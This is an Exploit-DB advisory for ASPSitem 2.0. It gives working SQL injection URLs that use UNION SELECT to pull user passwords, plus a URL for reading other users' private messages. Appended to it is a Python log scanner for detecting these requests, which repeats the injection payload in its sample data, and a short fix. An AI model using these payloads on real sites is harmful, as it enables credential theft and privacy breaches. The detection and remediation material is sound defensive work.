ASPSitem <= 2.0 - Remote SQL Injection / DB Disclosure Vulnerabilities

ID EDB-ID:1845
Type exploitdb
Reporter nukedx
Modified 2006-05-28T00:00:00


ASPSitem <= 2.0 Remote (SQL Injection / DB Disclosure) Vulnerabilities. CVE-2006-2793, CVE-2006-2794. Webapps exploit for asp platform

ASPSitem <= 2.0 Multiple Vulnerabilities.
Contacts > ICQ: 10072 MSN/Mail: web:
This exploit works on ASPSitem <= 2.0.
Original advisory can be found at:
SQL injection ->
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20
With this example, a remote attacker can leak the login information of user ID 1 from the database.
Read others' private messages ->
GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername
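
For defenders reviewing web server logs for the two request patterns above, the following is an added example, not part of the original advisory or of ASPSitem. It assumes the log has already been reduced to (client IP, request URL) pairs, that hid is meant to be a plain integer ID, and that one client reading messages under more than one uye value is worth review; the sample log is constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample log: (client IP, request URL). Not taken from a real server.
SAMPLE_LOG = [
    ("192.0.2.10", "/site/Anket.asp?hid=4"),
    ("192.0.2.66", "/site/anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler"),
    ("192.0.2.66", "/site/Anket.asp?hid=4%2527"),  # double-encoded quote
    ("192.0.2.10", "/site/Hesabim.asp?mesaj=oku&id=1&uye=alice"),
    ("192.0.2.66", "/site/Hesabim.asp?mesaj=oku&id=1&uye=alice"),
    ("192.0.2.66", "/site/Hesabim.asp?mesaj=oku&id=2&uye=bob"),
]

# Assumption: a legitimate hid is a short decimal integer and nothing else.
INTEGER = re.compile(r"[0-9]{1,10}")


def parse(url):
    """Return (lower-cased script name, URL-decoded query parameters)."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1].lower()
    params = parse_qs(parts.query, keep_blank_values=True)
    return script, {k.lower(): v for k, v in params.items()}


def scan(log):
    """Flag non-integer hid values and clients reading mail as several users."""
    findings = []
    readers = defaultdict(set)
    for client, url in log:
        script, params = parse(url)
        if script == "anket.asp":
            for value in params.get("hid", []):
                if not INTEGER.fullmatch(value):
                    findings.append((client, "hid-not-integer", value))
        elif script == "hesabim.asp" and "oku" in params.get("mesaj", []):
            readers[client].update(params.get("uye", []))
    # Heuristic (assumption): one client, several uye values on mesaj=oku.
    for client, users in sorted(readers.items()):
        if len(users) > 1:
            findings.append((client, "multiple-uye", ",".join(sorted(users))))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer check, applied server-side to hid before it reaches the query, together with taking the message owner from the authenticated session instead of the uye parameter, addresses both issues at the source.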

# [2006-05-27]

# [2006-05-28]